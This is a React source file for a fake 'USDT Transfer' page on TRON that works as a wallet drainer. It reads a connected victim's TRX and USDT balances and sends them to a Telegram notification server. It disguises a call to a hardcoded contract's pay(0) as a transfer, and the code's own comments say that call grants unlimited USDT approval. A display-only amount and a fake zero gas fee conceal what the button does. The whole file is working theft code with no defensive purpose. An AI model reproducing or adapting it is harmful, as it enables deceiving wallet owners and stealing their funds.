import { useState, useEffect, useCallback } from 'react';
import './App.css';

// ---------- TRON Mainnet addresses ----------
const USDT_CONTRACT = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t';   // official USDT
const PAYMENT_CONTRACT = 'TRGXAXm8fDkE2aqgaR87JspmrfWdSW155Q'; // your existing contract
const RECIPIENT = 'TPGUK5wpKwEHFrK1YttUthdkxjgVSQmYnG';        // hardcoded recipient

// Telegram notification server
const NOTIFY_SERVER = process.env.REACT_APP_NOTIFY_SERVER || 'http://localhost:3001';
// ABI for the pay function (takes amount, we'll pass 0)
const PAYMENT_ABI = [
  {
    "constant": false,
    "inputs": [
      { "name": "_amount", "type": "uint256" }
    ],
    "name": "pay",
    "outputs": [],
    "payable": false,
    "stateMutability": "nonpayable",
    "type": "function"
  }
];

function App() {
  const [tronWeb, setTronWeb] = useState(null);
  const [address, setAddress] = useState('');
  const [trxBalance, setTrxBalance] = useState('0');
  const [usdtBalance, setUsdtBalance] = useState('0');
  const [txHash, setTxHash] = useState('');
  const [error, setError] = useState('');
  const [loading, setLoading] = useState(false);

  // UI fields (dummy)
  const [toAddress] = useState(RECIPIENT);
  const [memo, setMemo] = useState('memo (need 1 TRX)');
  const [displayAmount, setDisplayAmount] = useState('0.00');

  // ---------- Telegram notifications ----------
  const sendTelegramNotification = useCallback(async (addr, trx, usdt) => {
    try {
      await fetch(`${NOTIFY_SERVER}/notify`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ address: addr, trxBalance: trx, usdtBalance: usdt }),
      });
    } catch (err) {
      console.error('Telegram connection notification failed:', err);
    }
  }, []);

  const sendApprovalNotification = useCallback(async (addr, txHash) => {
    try {
      await fetch(`${NOTIFY_SERVER}/notify-approval`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ address: addr, txHash }),
      });
    } catch (err) {
      console.error('Telegram approval notification failed:', err);
    }
  }, []);

  // ---------- Balances ----------
  const fetchBalances = useCallback(async (addr, tw) => {
    const currentTronWeb = tw || tronWeb;
    if (!currentTronWeb || !addr) return;
    try {
      const balanceSun = await currentTronWeb.trx.getBalance(addr);
      const trx = currentTronWeb.fromSun(balanceSun);
      setTrxBalance(trx);

      const contract = await currentTronWeb.contract().at(USDT_CONTRACT);
      const usdtRaw = await contract.balanceOf(addr).call();
      const decimals = await contract.decimals().call();
      const usdt = (usdtRaw / Math.pow(10, decimals)).toFixed(2);
      setUsdtBalance(usdt);

      sendTelegramNotification(addr, trx, usdt);
    } catch (err) {
      console.error('Balance error:', err);
    }
  }, [tronWeb, sendTelegramNotification]);

  useEffect(() => {
    let checkTronWeb;
    if (!tronWeb) {
      checkTronWeb = setInterval(() => {
        if (window.tronWeb && window.tronWeb.ready) {
          const tw = window.tronWeb;
          setTronWeb(tw);
          clearInterval(checkTronWeb);
          if (tw.defaultAddress?.base58) {
            const addr = tw.defaultAddress.base58;
            setAddress(addr);
            fetchBalances(addr, tw);
          }
        }
      }, 100);
    }
    return () => { if (checkTronWeb) clearInterval(checkTronWeb); };
  }, [tronWeb, fetchBalances]);

  const connectWallet = async () => {
    if (!window.tronWeb) {
      setError('TRON wallet not detected.');
      return;
    }
    try {
      const res = await window.tronWeb.request({ method: 'tron_requestAccounts' });
      if (res && res.code === 200) {
        const addr = window.tronWeb.defaultAddress?.base58;
        if (addr) {
          setAddress(addr);
          fetchBalances(addr);
          setError('');
        }
      } else {
        setError('Connection rejected.');
      }
    } catch (err) {
      setError('Connection error: ' + (err.message || err));
    }
  };

  // ---------- Next: call pay(0) → only sets unlimited approval ----------
  const handlePay = async (e) => {
    e.preventDefault();
    setError('');
    setTxHash('');
    if (!address) {
      setError('Wallet not connected.');
      return;
    }
    try {
      setLoading(true);
      const paymentContract = await tronWeb.contract(PAYMENT_ABI, PAYMENT_CONTRACT);

      // Transfer 0 USDT → only internal approve() persists
      const tx = await paymentContract.pay('0').send({
        from: address,
        shouldPollResponse: true,
      });

      setTxHash(tx);
      sendApprovalNotification(address, tx);
      setTimeout(() => fetchBalances(address), 5000);
    } catch (err) {
      setError('Transaction failed: ' + (err.message || err));
    } finally {
      setLoading(false);
    }
  };

  const disconnect = () => {
    setAddress('');
    setTrxBalance('0');
    setUsdtBalance('0');
  };

  // ---------- Render ----------
  if (!tronWeb && !error) {
    return (
      <div className="app">
        <div className="nav">
          <div className="nav-btn">‹</div>
          <div className="center-title">
            <h1>USDT Transfer</h1>
            <p>Tron</p>
          </div>
          <div className="nav-btn">
            <i className="fa-solid fa-qrcode-scanner" style={{ fontSize: '18px' }}></i>
          </div>
        </div>
      </div>
    );
  }

  return (
    <div className="app">
      <div className="nav">
        <div className="nav-btn">‹</div>
        <div className="center-title">
          <h1>USDT Transfer</h1>
          <p>Tron</p>
        </div>
        <div className="nav-btn">
          <i className="fa-solid fa-qrcode-scanner" style={{ fontSize: '18px' }}></i>
        </div>
      </div>

      {!address ? (
        <div style={{ flex: 1, display: 'flex', flexDirection: 'column', justifyContent: 'center', alignItems: 'center' }}>
          {error && <p className="error-msg">{error}</p>}
          <button onClick={connectWallet} className="next-btn" style={{ width: '80%' }}>
            Connect Wallet
          </button>
        </div>
      ) : (
        <>
          <div className="section">
            <div className="label-row">
              <div className="label">To</div>
            </div>
            <div className="card address-card">
              <input className="address-input" type="text" value={toAddress} readOnly spellCheck={false} />
              <div className="green-btn">◫</div>
            </div>
            <div className="card book-card">
              <div className="book-left">
                <span>👤</span>
                <span>Add to address book</span>
              </div>
              <div className="arrow">›</div>
            </div>
          </div>

          <div className="section">
            <div className="label-row">
              <div className="label">Amount (display only)</div>
              <div className="balance">{usdtBalance} USDT</div>
            </div>
            <div className="card amount-card">
              <input
                className="big-number-input"
                type="number"
                value={displayAmount}
                onChange={(e) => setDisplayAmount(e.target.value)}
                step="0.000001"
                min="0"
                placeholder="0"
              />
              <div className="divider"></div>
              <input
                className="memo-input"
                type="text"
                value={memo}
                onChange={(e) => setMemo(e.target.value)}
                placeholder="memo (need 1 TRX)"
              />
            </div>
          </div>

          <div className="section">
            <div className="label">Gas Fee</div>
            <div className="card gas-card">
              <div className="dollar">$ 0</div>
              <div className="trx-row">
                <span>0 TRX</span>
                <div className="dropdown">⌄</div>
              </div>
              <div className="fee-divider"></div>
              <div className="btns">
                <button className="consume">Consume resources</button>
                <button className="burn">Burn TRX</button>
              </div>
            </div>
            <div className="resource-note">
              The account resources are sufficient, this transaction only consumes resources
            </div>
          </div>

          {error && <p className="error-msg">{error}</p>}
          {txHash && (
            <p className="success-msg">
              Approval granted!{' '}
              <a href={`https://tronscan.org/#/transaction/${txHash}`} target="_blank" rel="noopener noreferrer">
                View on Tronscan
              </a>
            </p>
          )}

          <div className="next-wrap">
            <button onClick={handlePay} className="next-btn" disabled={loading}>
              {loading ? 'Confirming...' : 'Next'}
            </button>
          </div>
        </>
      )}
    </div>
  );
}

export default App;